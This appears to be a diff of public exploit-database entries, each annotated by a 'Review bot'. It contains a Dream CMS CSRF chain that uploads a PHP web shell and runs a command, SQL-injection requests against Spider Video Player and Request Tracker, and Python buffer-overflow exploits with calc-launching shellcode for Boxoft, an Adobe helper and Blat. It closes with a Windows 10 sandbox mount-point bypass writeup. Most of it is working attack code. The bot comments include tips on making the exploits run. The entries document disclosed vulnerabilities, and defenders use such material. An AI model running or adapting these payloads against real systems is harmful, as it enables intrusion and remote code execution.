Summary: DreamCMS is open and completely free PHP web application
for constructing websites of any complexity.
Desc: Dream CMS allows users to perform certain actions via HTTP requests
without performing any validity checks to verify the requests. This can be
exploited to perform certain actions with administrative privileges if a
logged-in user visits a malicious web site. Related to the CSRF issue, an
authenticated arbitrary PHP code execution exist. The vulnerability is caused
due to the improper verification of uploaded files in '/files-manager-administration/add-file'
script via the 'file' POST parameter which allows of arbitrary files being
uploaded in '/resource/filemanager/1/home/' where the admin first needs to add
the file extension in the allowed list (csrf'd). This can be exploited to execute
arbitrary PHP code by uploading a malicious PHP script file and execute system
commands.
Tested on: nginx/1.6.2
PHP/5.5.28
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5268
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5268.php
01.10.2015
-->
<html>
<head>
<title>Dream CMS 2.3.0 CSRF Add Extension And File Upload PHP Code Execution</title>
</head>
<body onload="exploitrun();">
<!-- 1. Add PHP allowed extension -->
<form name="addext" action="http://TARGET/pages/en/files-manager-administration/settings" method="POST" target="frame0">
<input type="hidden" name="form&#95;name" value="settings" />
<input type="hidden" name="file&#95;manager&#95;allowed&#95;extensions" value="bmp&#44;gif&#44;jpg&#44;png&#44;mp3&#44;wav&#44;wma&#44;3g2&#44;3gp&#44;avi&#44;flv&#44;mov&#44;mp4&#44;mpg&#44;swf&#44;vob&#44;wmv&#44;zip&#44;rar&#44;txt&#44;doc&#44;docx&#44;pdf&#44;php" />
<input type="hidden" name="file&#95;manager&#95;allowed&#95;size" value="2097152" />
<input type="hidden" name="file&#95;manager&#95;file&#95;name&#95;length" value="20" />
<input type="hidden" name="file&#95;manager&#95;image&#95;extensions" value="bmp&#44;gif&#44;jpg&#44;png" />
<input type="hidden" name="file&#95;manager&#95;media&#95;extensions" value="mp3&#44;wav&#44;wma&#44;3g2&#44;3gp&#44;avi&#44;flv&#44;mov&#44;mp4&#44;mpg&#44;swf&#44;vob&#44;wmv" />
<input type="hidden" name="file&#95;manager&#95;window&#95;width" value="60" />
<input type="hidden" name="file&#95;manager&#95;window&#95;height" value="500" />
<input type="hidden" name="file&#95;manager&#95;window&#95;image&#95;height" value="300" />
<input type="hidden" name="submit" value="Save" />
</form>
<!-- 2. Upload PHP file -->
<script>
function upload()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://TARGET/pages/en/files-manager-administration/add-file?path=home", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryuCEcIcPhpF3WD8Sv");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryuCEcIcPhpF3WD8Sv\r\n" +
"Content-Disposition: form-data; name=\"form_name\"\r\n" +
"\r\n" +
"file\r\n" +
"------WebKitFormBoundaryuCEcIcPhpF3WD8Sv\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"billy.php\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3c?php\r\n" +
"system($_GET[\"cmd\"]);\r\n" +
"?\x3e\r\n" +
"\r\n" +
"------WebKitFormBoundaryuCEcIcPhpF3WD8Sv\r\n" +
"Content-Disposition: form-data; name=\"submit\"\r\n" +
"\r\n" +
"Submit\r\n" +
"------WebKitFormBoundaryuCEcIcPhpF3WD8Sv--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form name="uploadme" action="javascript:upload();" target="frame1">
</form>
<!-- 3. Code execution -->
<form name="exploit" action="http://TARGET/resource/filemanager/1/home/billy.php" method="GET" target="frame2">
<input type="hidden" name="cmd" value="whoami" />
</form>
<iframe name="frame0"></iframe>
<iframe name="frame1"></iframe>
<iframe name="frame2"></iframe>
<script>
function exploitrun()
{
document.addext.submit();
document.getElementsByTagName("iframe")[0].onload = function()
{
document.uploadme.submit();
document.getElementsByTagName("iframe")[1].onload = function()
{
document.exploit.submit();
}
}
}
</script>
</body>
</html>
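Review bot: the step 1 form replaces the whole `file_manager_allowed_extensions` value with a hardcoded list ending in `php` rather than appending to whatever the target has configured, and it also overwrites the size, name-length, image, media and window settings with fixed values; the header comment should say that running this PoC rewrites the target's file-manager settings. The date in the comment block (`01.10.2015`) also differs from the CSV date (2015-10-11); state which is discovery and which is publication. From a defensive reading, the two requests that matter are the POST to `/files-manager-administration/settings` carrying `form_name=settings` and the multipart POST to `/files-manager-administration/add-file?path=home` with a `.php` filename, both sent without any anti-CSRF token, so a per-session token on those forms plus a server-side block on executable extensions regardless of the allowlist addresses the whole chain.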

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/59021/info
Spider Video Player plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Spider Video Player 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/player/settings.php?playlist=[num]&theme=[SQL]
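Review bot: the PoC is only a URL template (`playlist=[num]&theme=[SQL]`) with no indication of whether `settings.php` is reachable without authentication or what a successful response looks like, so the entry cannot be verified as written. The one concrete, defender-relevant fact is the path: `settings.php` is requested directly under `wp-content/plugins/player/`, outside WordPress's normal request routing, which is what a web-server rule or a log search should key on.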

21
platforms/php/webapps/38459.txt Executable file
@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/59022/info
Request Tracker is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
RT 4.0.10 is vulnerable; other versions may also be affected.
POST /Approvals/ HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Cookie: RT_SID_example.com.80=7c120854a0726239b379557f024cc1cb
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.example.com/Approvals/
Host: 10.10.10.70
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64;
Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR
3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Length: 120
ShowPending=1%27+and+%27f%27%3D%27f%27%29+--+&ShowResolved=1&ShowRejected=1&ShowDependent=1&CreatedBefore=&CreatedAfter=
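Review bot: the User-Agent header is wrapped across three lines without leading whitespace, so the request will not parse if replayed verbatim; keep it on one line or drop it, as it plays no part in the injection. The body is consistent (`Content-Length: 120` matches the 120-byte body) and `ShowPending` decodes to `1' and 'f'='f') -- `, an always-true condition, so the PoC only shows that the quote is accepted; pairing it with a false condition such as `'f'='g'` would let a reader confirm the boolean differential in the response. The `RT_SID_example.com.80` cookie also means a valid session is required, i.e. this is an authenticated injection, which the header text should say.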


@ -0,0 +1,41 @@
# Exploit Title: Boxoft WAV to MP3 Converter 1.1 - SEH Buffer Overflow
# Date: 10/13/2015
# Exploit Author: ArminCyber
# Contact: Armin.Exploit@gmail.com
# Version: 1.1
# Tested on: XP SP3 EN
# Description: A malicious .aiff file cause this vulnerability.
# category: Local Exploit
f = open("malicious.aiff", "w")
f.write("A"*4132)
f.write("\xeb\x06\x90\x90")
f.write("\xa4\x43\x40\x00")
# Shelcode:
# windows/exec - 277 bytes
# CMD=calc.exe
f.write("\x90"*20)
f.write("\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
"\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
"\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
"\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
"\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
"\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
"\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
"\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
"\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
"\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
"\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
"\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
"\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
"\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
"\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
"\xc4\xd9")
f.write("\x90"*20)
f.close()
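Review bot: the shellcode comment `# windows/exec - 277 bytes` does not match the bytes written, which are 15 lines of 15 plus the final 2, i.e. 227 bytes; fix the count so the offsets (4132 + 4 + 4 + 20 + shellcode + 20) can be checked against the crash. Two further points: `open("malicious.aiff", "w")` is text mode, so on Windows any `\x0a` in the buffer would be written as `\x0d\x0a` and shift the SEH layout (this payload happens to contain neither 0x0a nor 0x0d, but `"wb"` is the safe choice); and the SEH handler `\xa4\x43\x40\x00` (0x004043a4) ends in a null byte that sits before the NOP sled and shellcode, so the PoC relies on the parser copying past nulls, which is worth stating. The title says WAV to MP3 while the trigger is a `.aiff` file; a one-line note on how the file is loaded would help.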

147 platforms/windows/local/38467.py Executable file

@ -0,0 +1,147 @@
'''
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-ADOBE-WRKGRP-BUFFER-OVERFLOW.txt
Vendor:
================================
www.adobe.com
Product:
=================================
AdobeWorkgroupHelper.exe v2.8.3.3
Part of Photoshop 7.0 circa 2002
Vulnerability Type:
===========================
Stack Based Buffer Overflow
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
AdobeWorkgroupHelper.exe is a component of the Photoshop 7 workgroup
functionality, that lets users work with files on a server that is
registered as a workgroup.
If AdobeWorkgroupHelper.exe is called with an overly long command line
argument it is vulnerable to a stack based buffer overflow exploit.
Resluting in arbitrary code execution undermining the integrity of the
program. We can control EIP register at about 5,856 bytes, our shellcode
will point
to ECX register.
Tested successfully on Windows 7 SP1
Exploit code(s):
===============
Use below python script to exploit...
'''
import struct,os,subprocess
#Photoshop 7 AdobeWorkgroupHelper.exe buffer overflow exploit
#Tested Windows 7 SP1
#------------------------------------
#by hyp3rlinx - apparitionsec@gmail.com
#hyp3rlinx.altervista.org
#==============================================================
#
#0x618b19f7 : call ecx | {PAGE_EXECUTE_READ} [ARM.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.8.3.3
#(C:\Program Files (x86)\Common Files\Adobe\Workflow\ARM.dll)
#===============================================================
'''
Quick Register dump...
EAX 00270938
ECX 00270A7C <---------------BOOM!
EDX 00A515FC ASCII "AAAAAA..."
EBX 41414140
ESP 0018FEB0
EBP 0018FED0
ESI 00000000
EDI 41414141
EIP 004585C8 AdobeWor.004585C8
C 0 ES 002B 32bit 0(FFFFFFFF)
P 0 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
'''
#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
vulnpgm="C:\Program Files (x86)\Common
Files\Adobe\Workflow\AdobeWorkgroupHelper.exe "
#payload="A"*5852+"R"*4 #<---- control EIP register
#our shellcode will point at ECX register, so we need to find an JMP or
CALL ECX and point EIP to that address
#where our malicious code resides, we find it in ARM.dll
eip=struct.pack('<L', 0x618B19F7) #CALL ECX ARM.dll v2.8.3.3
payload="A"*5852+eip+"\x90"*20+sc #<----- direct EIP overwrite BOOOOOM!!!
subprocess.Popen([vulnpgm, payload], shell=False)
'''
Disclosure Timeline:
=========================================================
Vendor Notification: August 31, 2015
October 12, 2015 : Public Disclosure
Exploitation Technique:
=======================
Local
Severity Level:
=========================================================
Med
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
'''
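Review bot: the script as committed does not run: the string literal `vulnpgm="C:\Program Files (x86)\Common` continues on the next line as `Files\Adobe\Workflow\AdobeWorkgroupHelper.exe "`, and the comment `#our shellcode will point at ECX register, so we need to find an JMP or` continues as `CALL ECX and point EIP to that address` without a leading `#`; both are SyntaxErrors. Join the string on one line (preferably as a raw string, since `\P`, `\C`, `\A` and `\W` are only kept literal because they are not recognised escapes) and prefix the continuation with `#`. The trailing space inside `vulnpgm` is passed as part of the executable name to Popen and is best dropped. The shellcode ends in `\xCC` (int3), which raises an unhandled breakpoint exception after calc starts when no debugger is attached; fine for a PoC but worth a comment. The offset is internally consistent (`"A"*5852+eip` gives the 5,856 bytes quoted in the description).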

118 platforms/windows/local/38472.py Executable file

@ -0,0 +1,118 @@
'''
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-BLAT-MAILER-BUFFER-OVERFLOW.txt
Vendor:
================================
www.blat.net
http://sourceforge.net/projects/blat/
Product:
================================
Blat v2.7.6
blat.exe is a Win32 command line eMail tool
that sends eMail using SMTP or post to usenet using NNTP.
Vulnerability Type:
=====================
Stack Buffer Overflow
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
An older release of blat.exe v2.7.6 is prone to a stack based buffer
overflow when sending
malicious command line arguments, we need to send two arguments first
can be whatever e.g. "AAAA"
then second argument to trigger the buffer overflow and execute
arbitrary code on the victims OS.
Stack dump...
EAX 00000826
ECX 0018E828 ASCII "Blat saw and processed these options, and was
confused by the last one...
AAAAAAA...
EDX 0008E3C8
EBX 000000E1
ESP 0018F05C ASCII "AAAAA...
EBP 41414141
ESI 00426E88 blat.00426E88
EDI 00272FD8
EIP 41414141 <-------------- BOOM!
C 0 ES 002B 32bit 0(FFFFFFFF)
P 1 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 1 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
Exploit code(s):
===============
Python script to exploit...
'''
import struct,os,subprocess
#pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
vulnpgm="C:\\blat276\\full\\blat.exe "
eip=struct.pack('<L', 0x776D0115) #<--- JMP ESP kernel32.dll
payload="A"*2018+eip+"\x90"*20+sc
subprocess.Popen([vulnpgm, "A"*4, payload], shell=False)
'''
Disclosure Timeline:
=========================================================
Oct 14, 2015 : Public Disclosure
Severity Level:
=========================================================
Med
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that
due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given
to the author.
The author is not responsible for any misuse of the information
contained herein and prohibits any malicious use of all security
related information or exploits by the author or elsewhere.
by hyp3rlinx
'''
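Review bot: the return address `0x776D0115` (`JMP ESP kernel32.dll`) is in a system DLL that Windows 7 relocates with ASLR at every boot, so the exploit only hits the gadget on the author's machine for that boot session and lands EIP elsewhere on any other box or after a reboot; say so in the header (the only platform hint is the `#pop calc.exe Windows 7 SP1` comment, there is no `Tested on` line as in the Adobe advisory) or pick an address inside blat.exe, noting that a 0x004xxxxx address contains a null byte which terminates a command-line argument and so cannot be followed by the NOP sled and shellcode. The heading `Stack dump...` introduces a register dump, and the trailing `\xCC` int3 in the shellcode trips an unhandled breakpoint once calc has launched outside a debugger.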


@ -0,0 +1,52 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=486
Windows: Sandboxed Mount Reparse Point Creation Mitigation Bypass
Platform: Windows 10 (build 10240), earlier versions do not have the functionality
Class: Security Feature Bypass
Summary:
A mitigation added to Windows 10 to prevent NTFS Mount Reparse Points being created at integrity levels below medium can be bypassed.
Description:
Windows 10 has added some new mitigations to block the creation or change the behaviour of certain symbolic links when issued by a low integrity/sandboxed process. The presumed aim to to make it harder to abuse these types of tricks to break out of a sandbox.
In earlier builds on Windows 10 NTFS Mount Reparse Points were blocked outright from a sandboxed process, however in 10240 (what can only be assumed a final build) the check was moved to the kernel in IopXXXControlFile and changed slightly so that sandboxed processes could create some mount points. The check is roughly:
if (RtlIsSandboxedProcess()) {
if(ControlCode == FSCTL_SET_MOUNT_POINT) {
if (FsRtlValidateReparsePointBuffer(buffer) && buffer->ReparseTag == TAG_MOUNT_POINT) {
NTSTATUS status = ZwOpenFile(..., buffer->ReparseTarget, FILE_GENERIC_WRITE, ... , FILE_DIRECTORY_FILE);
if (!NT_SUCCESS(status)) {
return status;
}
}
}
The kernel is therefore checking that the target of the mount point is a directory and that the current process has write access to the directory. This would sufficiently limit the ability of a sandboxed process to abuse this to write files at a higher privilege. Unfortunately theres a perhaps unexpected problem with this check, the sandboxed process can redirect the ZwOpenFile call arbitrarily to something it can open for write, yet the original value is set as the mount point. This is because the file open check is being made inside the process which is doing the call which means it honours the users device mapping.
While the sandboxed process cannot change the per-user drive mappings, it can change the processs device map using NtSetInformationProcess with the ProcessDeviceMap information class. As we can create arbitrary object directories and symbolic links (which while they also have a mitigation it only prevents a higher privilege process following them, which we dont care about) we can build a completely fake device map which redirects the open to another directory. A good target turns out to be \Device\NamedPipe\ (note the trailing slash) as that can be opened from any privilege level (including Chrome renderer processes) for write access and as a directory. So if we want to set an arbitrary mount point to say \??\c:\somewhere we can build something like:
<UNNAMED>(DIR) -> C:(DIR) -> somewhere(LINK to \Device\NamedPipe\)
If we set the unnamed directory to the process device map we can bypass the check and create the mount point.
Perhaps from a fix perspective you could query for the opened path and use that to write to the NTFS reparse point rather than using the original value.
Proof of Concept:
Ive provided a PoC which will demonstrate the bypass. It should be executed at low integrity using psexec or modifying the executable files ACL to low. Ensure you use the correct version for the architecture on Windows, as there seems to be a bug in NtSetInformationProcess which blocks Wow64 apps from setting the process device map. You can compare the operation to the command shells mklink tool that will fail to create the mount point at low integrity. The archive password is password. Follow these steps:
1) Extract the PoC to a location on a local hard disk which is writable by a normal user.
2) Execute the poc executable file as low integrity passing two arguments, the path to a directory to create (must be somewhere than can be written to as low integrity user such as AppData\Temp\Low) and the arbitrary file path to set the mount point to. For example:
poc.exe c:\users\user\appdata\local\low\abc c:\notreal.
Expected Result:
It shouldnt be possible to create a mount point pointed at a location not writable by low integrity user
Observed Result:
The mount point is created successfully.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38474.zip
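Review bot: the pseudocode of the kernel check is missing the closing brace of the outer `if (RtlIsSandboxedProcess()) {` block: the three `}` lines close only the inner ifs, so add the fourth so the nesting matches the prose. Smaller points: apostrophes have been stripped throughout (`theres`, `dont`, `Ive`, `processs`, `shouldnt`); `Proof of Concept:` appears twice, once for the steps and once for the archive link; and the example invocation `poc.exe c:\users\user\appdata\local\low\abc c:\notreal.` ends with a period that reads as part of the target path, so put the command on its own line without trailing punctuation. The suggested fix (query the path the ZwOpenFile actually resolved and write that into the reparse buffer instead of the caller-supplied value) is the core of the finding and deserves its own short paragraph rather than a single sentence before the PoC.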